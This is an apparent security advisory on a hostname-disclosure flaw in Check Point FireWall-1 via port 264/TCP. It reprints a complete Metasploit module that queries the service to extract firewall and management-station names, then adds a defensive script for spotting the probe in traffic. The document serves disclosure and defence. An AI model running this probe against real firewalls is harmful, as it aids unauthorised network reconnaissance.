Release date: 2012-03-12
Updated: 2012-03-14

Affected systems:
Check Point Software FireWall-1 NGX R71
Check Point Software FireWall-1 NGX R65

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52430

Check Point Software Technologies Ltd., founded in 1993 with its US headquarters in Redwood City, California, is a foremost global vendor of Internet security solutions and a leader in the worldwide enterprise firewall, personal firewall and virtual private network (VPN) markets.

Multiple Check Point endpoint security products contain an information disclosure vulnerability in their implementation: sending certain queries to port 264/TCP on a CheckPoint Firewall-1 reveals the host name. An attacker can exploit this vulnerability to obtain sensitive information.

<*Source: Patrick Webster (pwebster@ausgeo.com.au)
  http://www.linuxidc.com/Linux/2012-03/56700.htm
*>

Test method:
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Patrick Webster (pwebster@ausgeo.com.au) provided the following test method:

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require "msf/core"

    class Metasploit3 < Msf::Auxiliary

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          "Name"           => "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
          "Description"    => %q{
            This module sends a query to the port 264/TCP on CheckPoint Firewall-1
            firewalls to obtain the firewall name and management station
            (such as SmartCenter) name via a pre-authentication topology request.
            Note that the SecuriTeam reference listed here is not the same vulnerability, but it
            does discuss the same protocol and is somewhat related to this information
            disclosure.
          },
          "Author"         => [ "patrick" ],
          "DisclosureDate" => "Dec 14 2011", # Looks like this module is first real reference
          "References"     =>
            [
              # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
              [ "URL", "http://www.osisecurity.com.au/advisories/" ], # Advisory coming soon, placeholder
              [ "URL", "http://www.securiteam.com/securitynews/5HP0D2A4UC.html" ] # Related-ish
            ]
        ))

        register_options(
          [
            Opt::RPORT(264),
          ], self.class)
      end

      def autofilter
        false
      end

      def run
        print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
        fw_hostname = nil
        sc_hostname = nil

        connect

        # Pre-authentication hello, sent as two 4-byte writes
        sock.put("\x51\x00\x00\x00")
        sock.put("\x00\x00\x00\x21")
        res = sock.get_once(4)
        if (res == "Y\x00\x00\x00")
          print_good("Appears to be a CheckPoint Firewall...")
          # Topology request naming the "securemote" service
          sock.put("\x00\x00\x00\x0bsecuremote\x00")
          res = sock.get_once
          # The reply carries the names as CN=<firewall>,O=<management station>.<suffix>
          if (res =~ /CN=(.+),O=(.+)\./i)
            fw_hostname = $1
            sc_hostname = $2
            print_good("Firewall Host: #{fw_hostname}")
            print_good("SmartCenter Host: #{sc_hostname}")
          end
        else
          print_error("Unexpected response: '#{res.inspect}'")
        end

        report_info(fw_hostname,sc_hostname)

        disconnect
      end

      # Only trust that it's real if we have a hostname. If you get a funny
      # response, it might not be what we think it is.
      def report_info(fw_hostname,sc_hostname)
        return unless fw_hostname
        host_info = {
          :host => datastore["RHOST"],
          :os_name => "Checkpoint Firewall-1",
          :purpose => "firewall"
        }
        host_info[:name] = fw_hostname
        host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
        report_host(host_info)
        svc_info = {
          :host => datastore["RHOST"],
          :port => datastore["RPORT"],
          :proto => "tcp",
          :name => "securemote"
        }
        report_service(svc_info)
      end
    end

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Check Point Software
--------------------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://www.checkpoint.com
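
For defenders reviewing traffic to port 264/TCP, the following added example (not part of the original advisory or of the Metasploit module) classifies reassembled TCP payloads against the byte sequence the module sends and lists any names a reply disclosed. The function names, verdict labels and sample streams are assumptions constructed for illustration.

```ruby
# Added example: offline triage of reassembled TCP payloads from port 264.
# Byte values are taken from the module above; the sample streams are constructed.

PROBE_HELLO = "\x51\x00\x00\x00\x00\x00\x00\x21".b # the module's two 4-byte writes
SERVER_ACK  = "Y\x00\x00\x00".b                     # reply the module accepts
TOPO_QUERY  = "\x00\x00\x00\x0bsecuremote\x00".b    # request sent after the ack

# Classify the client-to-server bytes of one connection.
def classify_client_stream(bytes)
  data = bytes.b
  return :not_probe unless data.start_with?(PROBE_HELLO)

  rest = data.byteslice(PROBE_HELLO.bytesize, data.bytesize)
  rest.start_with?(TOPO_QUERY) ? :topology_query : :hello_only
end

# Return the names a server-to-client stream disclosed, or nil if none.
# Uses the same CN=/O= pattern as the module.
def disclosed_names(bytes)
  data = bytes.b
  return nil unless data.start_with?(SERVER_ACK)

  m = data.match(/CN=(.+),O=(.+)\./i)
  m && { firewall: m[1], management: m[2] }
end

# Combine both directions into one verdict for an incident note.
def triage(client_bytes, server_bytes)
  kind = classify_client_stream(client_bytes)
  return { verdict: :not_probe } if kind == :not_probe

  names = disclosed_names(server_bytes)
  return { verdict: :probe_no_disclosure, stage: kind } unless names

  { verdict: :hostnames_disclosed, stage: kind }.merge(names)
end

# Constructed sample streams (hypothetical host names, real framing not modelled).
SAMPLE_CLIENT = PROBE_HELLO + TOPO_QUERY
SAMPLE_SERVER = SERVER_ACK + "CN=fw01,O=mgmt01.example.x7k2p9\x00".b
SAMPLE_OTHER  = "GET / HTTP/1.0\r\n\r\n".b

if __FILE__ == $PROGRAM_NAME
  p triage(SAMPLE_CLIENT, SAMPLE_SERVER)
  p triage(SAMPLE_CLIENT, SERVER_ACK)
  p triage(SAMPLE_OTHER, "")
end
```

A `hostnames_disclosed` verdict means the names in the result should be treated as known to whoever sent the probe.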